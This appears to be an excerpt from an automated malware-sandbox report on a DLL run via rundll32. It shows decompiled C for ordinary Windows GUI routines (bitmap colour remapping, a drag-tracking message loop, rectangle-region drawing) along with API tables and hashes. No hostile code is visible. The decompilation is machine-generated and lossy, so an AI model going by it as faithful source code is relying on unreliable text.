				_t53 = E1003A230(_t76, _t91,  *_t76 + 0x40, _t103,  *_t76 + 0x40);
				_t104 = _t53;
				if(_t104 == 0) {
					L16:
					goto L17;
				} else {
					E10007E59(_t98, _t104, _t106, _t104, _t98, _t76, _t98);
					_t56 = _t104 + _t104->bmiHeader;
					_a8 = _a8 & 0x00000000;
					_v12 = _t56;
					do {
						_t82 = _t56 + _a8 * 4;
						_t100 =  *_t82;
						_t92 = 0;
						_v8 = _t82;
						while(_t100 !=  *((intOrPtr*)(0x10059d74 + _t92 * 8))) {
							_t92 = _t92 + 1;
							if(_t92 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t101 = 0x10059d78 + _t92 * 8;
							_a4 = GetSysColor( *_t101) & 0x000000ff;
							GetSysColor( *_t101);
							_a4 = _a4 << 8;
							_t63 = GetSysColor( *_t101) >> 0x00000010 & 0x000000ff | _a4;
							__eflags = _t63;
							 *_v8 = _t63;
							_t56 = _v12;
						} else {
							__eflags =  *(0x10059d78 + _t92 * 8) - 0x12;
							if(__eflags != 0) {
								 *_t82 = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t102 = _t104->bmiHeader.biWidth;
					_t79 = _t104->bmiHeader.biHeight;
					_a4 = _t102;
					_a8 = _t79;
					_t64 = GetDC(0);
					_a12 = _t64;
					_t65 = CreateCompatibleBitmap(_t64, _t102, _t79);
					_v8 = _t65;
					if(_t65 != 0) {
						_t69 = CreateCompatibleDC(_a12);
						_t102 = SelectObject;
						_t79 = _t69;
						_v12 = SelectObject(_t79, _v8);
						StretchDIBits(_t79, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v16 + 0x28 + (1 << _t104->bmiHeader.biBitCount) * 4, _t104, 0, 0xcc0020);
						SelectObject(_t79, _v12);
						DeleteDC(_t79);
					}
					ReleaseDC(0, _a12);
					_push(_t104);
					E10039F30(_t79, _t102, _t104, 0);
					FreeResource(_v20);
					_t53 = _v8;
					goto L16;
				}
			}





























                                                                                                        0x10011efb
                                                                                                        0x10011f03
                                                                                                        0x10011f06
                                                                                                        0x1001206d
                                                                                                        0x1001206d
                                                                                                        0x10011f0e
                                                                                                        0x10011f14
                                                                                                        0x10011f18
                                                                                                        0x10011f1b
                                                                                                        0x1001206b
                                                                                                        0x00000000
                                                                                                        0x1001206b
                                                                                                        0x10011f21
                                                                                                        0x10011f25
                                                                                                        0x10011f29
                                                                                                        0x10011f2e
                                                                                                        0x10011f33
                                                                                                        0x10012069
                                                                                                        0x00000000
                                                                                                        0x10011f39
                                                                                                        0x10011f3d
                                                                                                        0x10011f4a
                                                                                                        0x10011f4f
                                                                                                        0x10011f53
                                                                                                        0x10011f56
                                                                                                        0x10011f59
                                                                                                        0x10011f5c
                                                                                                        0x10011f5e
                                                                                                        0x10011f60
                                                                                                        0x10011f63
                                                                                                        0x10011f6c
                                                                                                        0x10011f70
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10011f72
                                                                                                        0x10011f74
                                                                                                        0x10011f78
                                                                                                        0x10011f8c
                                                                                                        0x10011f9c
                                                                                                        0x10011f9f
                                                                                                        0x10011fad
                                                                                                        0x10011fbc
                                                                                                        0x10011fbc
                                                                                                        0x10011fbf
                                                                                                        0x10011fc1
                                                                                                        0x10011f7a
                                                                                                        0x10011f7a
                                                                                                        0x10011f82
                                                                                                        0x10011f84
                                                                                                        0x10011f84
                                                                                                        0x10011f82
                                                                                                        0x10011fc4
                                                                                                        0x10011fc4
                                                                                                        0x10011fc7
                                                                                                        0x10011fcd
                                                                                                        0x10011fd0
                                                                                                        0x10011fd5
                                                                                                        0x10011fd8
                                                                                                        0x10011fdb
                                                                                                        0x10011fe4
                                                                                                        0x10011fe7
                                                                                                        0x10011fef
                                                                                                        0x10011ff2
                                                                                                        0x10011ff7
                                                                                                        0x10012000
                                                                                                        0x10012006
                                                                                                        0x1001201b
                                                                                                        0x10012038
                                                                                                        0x10012042
                                                                                                        0x10012045
                                                                                                        0x10012045
                                                                                                        0x10012050
                                                                                                        0x10012056
                                                                                                        0x10012057
                                                                                                        0x10012060
                                                                                                        0x10012066
                                                                                                        0x00000000
                                                                                                        0x10012066

                                                                                                        APIs
                                                                                                        • LoadResource.KERNEL32(?,?), ref: 10011EFB
                                                                                                        • LockResource.KERNEL32(00000000), ref: 10011F0E
                                                                                                        • _malloc.LIBCMT ref: 10011F29
                                                                                                          • Part of subcall function 1003A230: __FF_MSGBANNER.LIBCMT ref: 1003A253
                                                                                                          • Part of subcall function 1003A230: __NMSG_WRITE.LIBCMT ref: 1003A25A
                                                                                                          • Part of subcall function 1003A230: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,100416EE,?,00000001,00000001,100408A6,00000018,1006CDA0,0000000C,10040935,00000001), ref: 1003A2A8
                                                                                                          • Part of subcall function 10007E59: _memcpy_s.LIBCMT ref: 10007E69
                                                                                                        • GetSysColor.USER32 ref: 10011F95
                                                                                                        • GetSysColor.USER32 ref: 10011F9F
                                                                                                        • GetSysColor.USER32 ref: 10011FB1
                                                                                                        • GetDC.USER32(00000000), ref: 10011FDB
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 10011FE7
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 10011FF7
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 10012009
                                                                                                        • StretchDIBits.GDI32(00000000,00000000,00000000,00000008,00000010,00000000,00000000,00000008,00000010,?,00000000,00000000,00CC0020), ref: 10012038
                                                                                                        • SelectObject.GDI32(00000000,00000008), ref: 10012042
                                                                                                        • DeleteDC.GDI32(00000000), ref: 10012045
                                                                                                        • ReleaseDC.USER32 ref: 10012050
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 10012060
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ColorResource$CompatibleCreateObjectSelect$AllocateBitmapBitsDeleteFreeHeapLoadLockReleaseStretch_malloc_memcpy_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 2870220007-0
                                                                                                        • Opcode ID: 992ce404a7c3b8a6a9d6393e2e7ab8712d75b85ffc005dc4d8c38dc4d2ccf487
                                                                                                        • Instruction ID: 3ec1eb51cf0d876659863412adbc1939ba0711b9f1e2081631734deed92cc252
                                                                                                        • Opcode Fuzzy Hash: 992ce404a7c3b8a6a9d6393e2e7ab8712d75b85ffc005dc4d8c38dc4d2ccf487
                                                                                                        • Instruction Fuzzy Hash: 76417C75900218EFEB01DFA4CC84AEE7BB9EF48351B108429F9169B2A1D730DA61DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002E1CC, Relevance: 21.2, APIs: 14, Instructions: 248windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E1002E1CC(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20) {
				RECT* _v8;
				struct HWND__* _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct tagRECT _v52;
				struct tagRECT _v68;
				struct tagMSG _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t111;
				signed int _t121;
				struct HDC__* _t123;
				intOrPtr _t124;
				void* _t128;
				signed int _t130;
				signed int _t131;
				signed int _t138;
				signed int _t140;
				signed int _t145;
				intOrPtr* _t146;
				int _t151;
				int _t155;
				signed int _t161;
				intOrPtr* _t169;
				signed int _t172;
				signed int* _t173;
				signed int _t180;
				signed int _t185;
				signed int _t187;
				intOrPtr _t189;
				signed int _t191;
				intOrPtr* _t196;
				struct HWND__* _t197;
				void* _t203;

				_t181 = __edx;
				_t170 = __ecx;
				_t169 = __ecx;
				if(GetCapture() == 0) {
					E1002A45C(__eflags);
					_t189 = _a8;
					_t196 = _t169 + 8;
					_v8 = _t196;
					_v32 =  *((intOrPtr*)(_t196 + 8)) -  *_t196;
					_v36 =  *((intOrPtr*)(_t196 + 0xc)) -  *((intOrPtr*)(_t196 + 4));
					E1000E5E5(_t169, _t170, _t203, SetCapture( *(_t189 + 0x20)));
					UpdateWindow( *(_t189 + 0x20));
					_t111 = _a20;
					__eflags = _t111;
					if(_t111 != 0) {
						UpdateWindow( *(_t111 + 0x20));
					}
					_t191 =  &_v68;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t171 = _t169;
					asm("movsd");
					E1002DCB6(_t169, _a4,  &_v24,  &_v28,  &_v16,  &_v20);
					_t197 = 0;
					_v16 = _a12 - _v16;
					_v20 = _a16 - _v20;
					_t121 = _a20;
					__eflags = _t121;
					if(__eflags == 0) {
						_t123 = GetDC( *(_a8 + 0x20));
					} else {
						_t123 = GetDCEx( *(_t121 + 0x20), 0, 2);
					}
					_push(_t123);
					_t124 = E10008F77(_t169, _t171, _t191, _t197, __eflags);
					__eflags = _t124 - _t197;
					_a16 = _t124;
					if(__eflags == 0) {
						E1000836F(_t169, _t171, _t191, _t197, __eflags);
					}
					_v12 = _t197;
					while(1) {
						GetMessageA( &_v96, _t197, _t197, _t197);
						_t128 = E1000E5E5(_t169, _t171, _t203, GetCapture());
						__eflags = _t128 - _a8;
						if(_t128 != _a8) {
							break;
						}
						_t171 = 0x100;
						_t130 = _v96.message - 0x100;
						__eflags = _t130;
						if(_t130 == 0) {
							__eflags = _v96.wParam - 0x1b;
							if(_v96.wParam != 0x1b) {
								continue;
							}
							L34:
							__eflags = _v12 - _t197;
							if(_v12 != _t197) {
								__eflags = 1;
								 *(_t169 + 0x44) = 1;
								 *(_t169 + 0x40) = 1;
								_t171 = _t169;
								 *((intOrPtr*)( *_t169))(_v8, _a20, _a16, _a8);
							}
							_t191 = _v8;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L37:
							_t197 = 0;
							__eflags = 0;
							L38:
							_t131 = _a20;
							__eflags = _t131 - _t197;
							if(__eflags == 0) {
								_push( *((intOrPtr*)(_a16 + 4)));
								_push( *(_a8 + 0x20));
							} else {
								_t171 = _a16;
								_push( *((intOrPtr*)(_a16 + 4)));
								_push( *((intOrPtr*)(_t131 + 0x20)));
							}
							ReleaseDC();
							ReleaseCapture();
							E1002A66D(_t171, _t181, _t191, __eflags, _t197);
							__eflags = _v12 - _t197;
							if(_v12 == _t197) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t197 = 0;
								__eflags = 0;
							}
							 *(_t169 + 0x44) = _t197;
							 *(_t169 + 0x40) = _t197;
							_t138 = EqualRect( &_v68, _v8);
							asm("sbb eax, eax");
							_t140 = 1 +  ~_t138;
							__eflags = _t140;
							return _t140;
						}
						_t145 = _t130 - 0x100;
						__eflags = _t145;
						if(_t145 == 0) {
							L15:
							_t146 = _v8;
							_t172 = _v24;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t191 = 0;
							__eflags = _t172;
							if(_t172 != 0) {
								_t187 = _v96.lParam - _v16;
								__eflags = _t187;
								 *_t172 = _t187;
							}
							_t173 = _v28;
							__eflags = _t173 - _t191;
							if(_t173 != _t191) {
								_t185 = (_v96.lParam >> 0x10) - _v20;
								__eflags = _t185;
								 *_t173 = _t185;
							}
							__eflags = _a4 - 8;
							if(_a4 == 8) {
								 *((intOrPtr*)(_t169 + 0x10)) =  *_t146 + _v32;
								_t180 =  *((intOrPtr*)(_t169 + 0xc)) + _v36;
								__eflags = _t180;
								 *(_t169 + 0x14) = _t180;
							}
							_t181 =  *_t169;
							_t171 = _t169;
							 *((intOrPtr*)( *_t169 + 4))(_a4, _t146);
							__eflags = _v96.message - 0x202;
							 *(_t169 + 0x44) = 0 | _v96.message == 0x00000202;
							_t151 = EqualRect( &_v52, _v8);
							__eflags = _t151;
							if(_t151 == 0) {
								L23:
								__eflags = _v12 - _t191;
								if(_v12 != _t191) {
									 *(_t169 + 0x40) = 1;
									 *((intOrPtr*)( *_t169))( &_v52, _a20, _a16, _a8);
								}
								_t171 = _t169;
								 *((intOrPtr*)( *_t169 + 8))( &_v52);
								__eflags = _v96.message - 0x202;
								if(_v96.message != 0x202) {
									_v12 = 1;
								}
								__eflags =  *(_t169 + 0x44) - _t191;
								if( *(_t169 + 0x44) != _t191) {
									goto L37;
								} else {
									goto L28;
								}
							} else {
								__eflags =  *(_t169 + 0x44) - _t191;
								if( *(_t169 + 0x44) == _t191) {
									L28:
									_t155 = EqualRect( &_v52, _v8);
									__eflags = _t155;
									if(_t155 == 0) {
										_t71 = _t169 + 0x40;
										 *_t71 =  *(_t169 + 0x40) & _t191;
										__eflags =  *_t71;
										_t171 = _t169;
										 *((intOrPtr*)( *_t169))(_v8, _a20, _a16, _a8);
									}
									_t197 = 0;
									__eflags = 0;
									continue;
								}
								goto L23;
							}
						}
						_t161 = _t145;
						__eflags = _t161;
						if(_t161 == 0) {
							goto L15;
						}
						__eflags = _t161 == 0;
						if(_t161 == 0) {
							goto L34;
						}
						DispatchMessageA( &_v96);
					}
					goto L38;
				}
				return 0;
			}











































                                                                                                        0x1002e1cc
                                                                                                        0x1002e1cc
                                                                                                        0x1002e1d3
                                                                                                        0x1002e1dd
                                                                                                        0x1002e1e8
                                                                                                        0x1002e1ed
                                                                                                        0x1002e1f3
                                                                                                        0x1002e1fb
                                                                                                        0x1002e1fe
                                                                                                        0x1002e207
                                                                                                        0x1002e211
                                                                                                        0x1002e21f
                                                                                                        0x1002e221
                                                                                                        0x1002e224
                                                                                                        0x1002e226
                                                                                                        0x1002e22b
                                                                                                        0x1002e22b
                                                                                                        0x1002e22d
                                                                                                        0x1002e230
                                                                                                        0x1002e239
                                                                                                        0x1002e241
                                                                                                        0x1002e246
                                                                                                        0x1002e248
                                                                                                        0x1002e249
                                                                                                        0x1002e254
                                                                                                        0x1002e256
                                                                                                        0x1002e25f
                                                                                                        0x1002e262
                                                                                                        0x1002e265
                                                                                                        0x1002e267
                                                                                                        0x1002e27d
                                                                                                        0x1002e269
                                                                                                        0x1002e26f
                                                                                                        0x1002e26f
                                                                                                        0x1002e283
                                                                                                        0x1002e284
                                                                                                        0x1002e289
                                                                                                        0x1002e28b
                                                                                                        0x1002e28e
                                                                                                        0x1002e290
                                                                                                        0x1002e290
                                                                                                        0x1002e295
                                                                                                        0x1002e3aa
                                                                                                        0x1002e3b1
                                                                                                        0x1002e3be
                                                                                                        0x1002e3c3
                                                                                                        0x1002e3c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e2a0
                                                                                                        0x1002e2a5
                                                                                                        0x1002e2a5
                                                                                                        0x1002e2a7
                                                                                                        0x1002e3ce
                                                                                                        0x1002e3d2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e3d4
                                                                                                        0x1002e3d4
                                                                                                        0x1002e3d7
                                                                                                        0x1002e3e1
                                                                                                        0x1002e3e5
                                                                                                        0x1002e3eb
                                                                                                        0x1002e3f0
                                                                                                        0x1002e3f2
                                                                                                        0x1002e3f2
                                                                                                        0x1002e3f4
                                                                                                        0x1002e3fa
                                                                                                        0x1002e3fb
                                                                                                        0x1002e3fc
                                                                                                        0x1002e3fd
                                                                                                        0x1002e3fe
                                                                                                        0x1002e3fe
                                                                                                        0x1002e3fe
                                                                                                        0x1002e400
                                                                                                        0x1002e400
                                                                                                        0x1002e403
                                                                                                        0x1002e405
                                                                                                        0x1002e415
                                                                                                        0x1002e41b
                                                                                                        0x1002e407
                                                                                                        0x1002e407
                                                                                                        0x1002e40a
                                                                                                        0x1002e40d
                                                                                                        0x1002e40d
                                                                                                        0x1002e41e
                                                                                                        0x1002e424
                                                                                                        0x1002e42b
                                                                                                        0x1002e430
                                                                                                        0x1002e433
                                                                                                        0x1002e43b
                                                                                                        0x1002e43c
                                                                                                        0x1002e43d
                                                                                                        0x1002e43e
                                                                                                        0x1002e43f
                                                                                                        0x1002e43f
                                                                                                        0x1002e43f
                                                                                                        0x1002e448
                                                                                                        0x1002e44b
                                                                                                        0x1002e44e
                                                                                                        0x1002e456
                                                                                                        0x1002e459
                                                                                                        0x1002e459
                                                                                                        0x00000000
                                                                                                        0x1002e45a
                                                                                                        0x1002e2ad
                                                                                                        0x1002e2ad
                                                                                                        0x1002e2af
                                                                                                        0x1002e2cc
                                                                                                        0x1002e2cc
                                                                                                        0x1002e2cf
                                                                                                        0x1002e2d7
                                                                                                        0x1002e2d8
                                                                                                        0x1002e2d9
                                                                                                        0x1002e2da
                                                                                                        0x1002e2db
                                                                                                        0x1002e2dd
                                                                                                        0x1002e2df
                                                                                                        0x1002e2e5
                                                                                                        0x1002e2e5
                                                                                                        0x1002e2e8
                                                                                                        0x1002e2e8
                                                                                                        0x1002e2ea
                                                                                                        0x1002e2ed
                                                                                                        0x1002e2ef
                                                                                                        0x1002e2fa
                                                                                                        0x1002e2fa
                                                                                                        0x1002e2fd
                                                                                                        0x1002e2fd
                                                                                                        0x1002e2ff
                                                                                                        0x1002e303
                                                                                                        0x1002e30a
                                                                                                        0x1002e310
                                                                                                        0x1002e310
                                                                                                        0x1002e313
                                                                                                        0x1002e313
                                                                                                        0x1002e316
                                                                                                        0x1002e31c
                                                                                                        0x1002e31e
                                                                                                        0x1002e32b
                                                                                                        0x1002e331
                                                                                                        0x1002e338
                                                                                                        0x1002e33e
                                                                                                        0x1002e340
                                                                                                        0x1002e347
                                                                                                        0x1002e347
                                                                                                        0x1002e34a
                                                                                                        0x1002e35a
                                                                                                        0x1002e364
                                                                                                        0x1002e364
                                                                                                        0x1002e36c
                                                                                                        0x1002e36e
                                                                                                        0x1002e371
                                                                                                        0x1002e374
                                                                                                        0x1002e376
                                                                                                        0x1002e376
                                                                                                        0x1002e37d
                                                                                                        0x1002e380
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e342
                                                                                                        0x1002e342
                                                                                                        0x1002e345
                                                                                                        0x1002e382
                                                                                                        0x1002e389
                                                                                                        0x1002e38f
                                                                                                        0x1002e391
                                                                                                        0x1002e39b
                                                                                                        0x1002e39b
                                                                                                        0x1002e39b
                                                                                                        0x1002e3a1
                                                                                                        0x1002e3a6
                                                                                                        0x1002e3a6
                                                                                                        0x1002e3a8
                                                                                                        0x1002e3a8
                                                                                                        0x00000000
                                                                                                        0x1002e3a8
                                                                                                        0x00000000
                                                                                                        0x1002e345
                                                                                                        0x1002e340
                                                                                                        0x1002e2b2
                                                                                                        0x1002e2b2
                                                                                                        0x1002e2b3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e2b6
                                                                                                        0x1002e2b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e2c1
                                                                                                        0x1002e2c1
                                                                                                        0x00000000
                                                                                                        0x1002e3cc
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetCapture.USER32 ref: 1002E1D5
                                                                                                        • SetCapture.USER32(?,?,?,?,?,?,?,?,1002E493,00000000,?,?,?,?,?,?), ref: 1002E20A
                                                                                                        • UpdateWindow.USER32(?), ref: 1002E21F
                                                                                                        • UpdateWindow.USER32(?), ref: 1002E22B
                                                                                                        • GetDCEx.USER32(?,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,1002E493,00000000,?), ref: 1002E26F
                                                                                                        • GetMessageA.USER32 ref: 1002E3B1
                                                                                                        • GetCapture.USER32 ref: 1002E3B7
                                                                                                        • ReleaseDC.USER32 ref: 1002E41E
                                                                                                        • ReleaseCapture.USER32 ref: 1002E424
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Capture$ReleaseUpdateWindow$Message
                                                                                                        • String ID:
                                                                                                        • API String ID: 2454456769-0
                                                                                                        • Opcode ID: cebc1c3416efb2c5bc40518e0a84564a25f72bff54c558533b41f7e530cffb30
                                                                                                        • Instruction ID: dc39ec279f3e44a309d8a0762089c75dbcd4d86acfb3125876833c5cfee86e69
                                                                                                        • Opcode Fuzzy Hash: cebc1c3416efb2c5bc40518e0a84564a25f72bff54c558533b41f7e530cffb30
                                                                                                        • Instruction Fuzzy Hash: EB915A71900269EFCF11CFA4D9888AEBBBAFF08341B504169F905AB224D731EE50DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002180B, Relevance: 19.7, APIs: 13, Instructions: 231windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E1002180B(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t135;
				intOrPtr _t194;
				intOrPtr* _t228;
				void* _t230;
				intOrPtr _t233;

				_push(0x38);
				E1003EE82(0x10054e70, __ebx, __edi, __esi);
				_t228 = __ecx;
				 *((intOrPtr*)(_t230 - 0x30)) = 0;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x1005c400;
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x28)) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x1005c400;
				 *((intOrPtr*)(_t230 - 0x20)) = 0;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x1005c400;
				 *(_t230 - 4) = 2;
				E1002165F(_t230 - 0x2c,  *(_t230 + 8));
				CopyRect(_t230 - 0x44,  *(_t230 + 8));
				InflateRect(_t230 - 0x44,  ~( *(_t230 + 0xc)),  ~( *(_t230 + 0x10)));
				IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 8));
				E10009236(_t230 - 0x24, 0x1005c400, _t230, CreateRectRgnIndirect(_t230 - 0x44));
				E10009236(_t230 - 0x34, 0x1005c400, _t230, CreateRectRgn(0, 0, 0, 0));
				E10021693(_t230 - 0x34, _t230 - 0x2c, _t230 - 0x24, 3);
				_t232 =  *((intOrPtr*)(_t230 + 0x20));
				if( *((intOrPtr*)(_t230 + 0x20)) == 0) {
					 *((intOrPtr*)(_t230 + 0x20)) = E10021768(0, 0x1005c400, _t228, _t232);
				}
				_t194 =  *((intOrPtr*)(_t230 + 0x20));
				_t233 = _t194;
				_t234 = _t233 == 0;
				if(_t233 == 0) {
					E1000836F(0, _t194, 0x1005c400, _t228, _t234);
				}
				if( *((intOrPtr*)(_t230 + 0x24)) == 0) {
					 *((intOrPtr*)(_t230 + 0x24)) = _t194;
				}
				 *((intOrPtr*)(_t230 - 0x18)) = 0;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x1005c400;
				 *((intOrPtr*)(_t230 - 0x10)) = 0;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x1005c400;
				 *(_t230 - 4) = 4;
				if( *(_t230 + 0x14) != 0) {
					E10009236(_t230 - 0x1c, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
					E10021678(_t230 - 0x2c,  *(_t230 + 0x14));
					CopyRect(_t230 - 0x44,  *(_t230 + 0x14));
					InflateRect(_t230 - 0x44,  ~( *(_t230 + 0x18)),  ~( *(_t230 + 0x1c)));
					IntersectRect(_t230 - 0x44, _t230 - 0x44,  *(_t230 + 0x14));
					E10021678(_t230 - 0x24, _t230 - 0x44);
					E10021693(_t230 - 0x1c, _t230 - 0x2c, _t230 - 0x24, 3);
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4))) {
						E10009236(_t230 - 0x14, CreateRectRgn, _t230, CreateRectRgn(0, 0, 0, 0));
						E10021693(_t230 - 0x14, _t230 - 0x1c, _t230 - 0x34, 3);
					}
				}
				if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x24)) + 4)) &&  *(_t230 + 0x14) != 0) {
					E10008C96(_t228, _t230 - 0x1c);
					 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
					 *(_t230 + 0x14) = E10009357(_t228,  *((intOrPtr*)(_t230 + 0x24)));
					PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
					E10009357(_t228,  *(_t230 + 0x14));
				}
				_t135 = _t230 - 0x14;
				if( *((intOrPtr*)(_t230 - 0x10)) == 0) {
					_t135 = _t230 - 0x34;
				}
				E10008C96(_t228, _t135);
				 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
				 *(_t230 + 0x14) = E10009357(_t228,  *((intOrPtr*)(_t230 + 0x20)));
				PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
				if( *(_t230 + 0x14) != 0) {
					E10009357(_t228,  *(_t230 + 0x14));
				}
				E10008C96(_t228, 0);
				 *(_t230 - 4) = 3;
				 *((intOrPtr*)(_t230 - 0x14)) = 0x10058e64;
				E10009289(_t230 - 0x14);
				 *(_t230 - 4) = 2;
				 *((intOrPtr*)(_t230 - 0x1c)) = 0x10058e64;
				E10009289(_t230 - 0x1c);
				 *(_t230 - 4) = 1;
				 *((intOrPtr*)(_t230 - 0x24)) = 0x10058e64;
				E10009289(_t230 - 0x24);
				 *(_t230 - 4) = 0;
				 *((intOrPtr*)(_t230 - 0x2c)) = 0x10058e64;
				E10009289(_t230 - 0x2c);
				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t230 - 0x34)) = 0x10058e64;
				return E1003EF21(E10009289(_t230 - 0x34));
			}








                                                                                                        0x1002180b
                                                                                                        0x10021812
                                                                                                        0x10021817
                                                                                                        0x10021820
                                                                                                        0x10021823
                                                                                                        0x10021826
                                                                                                        0x10021829
                                                                                                        0x1002182c
                                                                                                        0x1002182f
                                                                                                        0x10021832
                                                                                                        0x1002183b
                                                                                                        0x1002183f
                                                                                                        0x1002184b
                                                                                                        0x10021861
                                                                                                        0x1002186f
                                                                                                        0x10021883
                                                                                                        0x10021896
                                                                                                        0x100218a8
                                                                                                        0x100218ad
                                                                                                        0x100218b0
                                                                                                        0x100218b7
                                                                                                        0x100218b7
                                                                                                        0x100218ba
                                                                                                        0x100218bf
                                                                                                        0x100218c4
                                                                                                        0x100218c6
                                                                                                        0x100218c8
                                                                                                        0x100218c8
                                                                                                        0x100218d0
                                                                                                        0x100218d2
                                                                                                        0x100218d2
                                                                                                        0x100218d5
                                                                                                        0x100218d8
                                                                                                        0x100218db
                                                                                                        0x100218de
                                                                                                        0x100218e4
                                                                                                        0x100218e8
                                                                                                        0x100218fe
                                                                                                        0x10021909
                                                                                                        0x10021915
                                                                                                        0x1002192b
                                                                                                        0x10021939
                                                                                                        0x10021946
                                                                                                        0x10021958
                                                                                                        0x10021969
                                                                                                        0x10021975
                                                                                                        0x10021987
                                                                                                        0x10021987
                                                                                                        0x10021969
                                                                                                        0x1002199e
                                                                                                        0x100219ab
                                                                                                        0x100219b8
                                                                                                        0x100219cb
                                                                                                        0x100219e4
                                                                                                        0x100219eb
                                                                                                        0x100219eb
                                                                                                        0x100219f3
                                                                                                        0x100219f6
                                                                                                        0x100219f8
                                                                                                        0x100219f8
                                                                                                        0x100219fe
                                                                                                        0x10021a0b
                                                                                                        0x10021a1e
                                                                                                        0x10021a37
                                                                                                        0x10021a3c
                                                                                                        0x10021a43
                                                                                                        0x10021a43
                                                                                                        0x10021a4b
                                                                                                        0x10021a58
                                                                                                        0x10021a5c
                                                                                                        0x10021a5f
                                                                                                        0x10021a67
                                                                                                        0x10021a6b
                                                                                                        0x10021a6e
                                                                                                        0x10021a76
                                                                                                        0x10021a7a
                                                                                                        0x10021a7d
                                                                                                        0x10021a85
                                                                                                        0x10021a88
                                                                                                        0x10021a8b
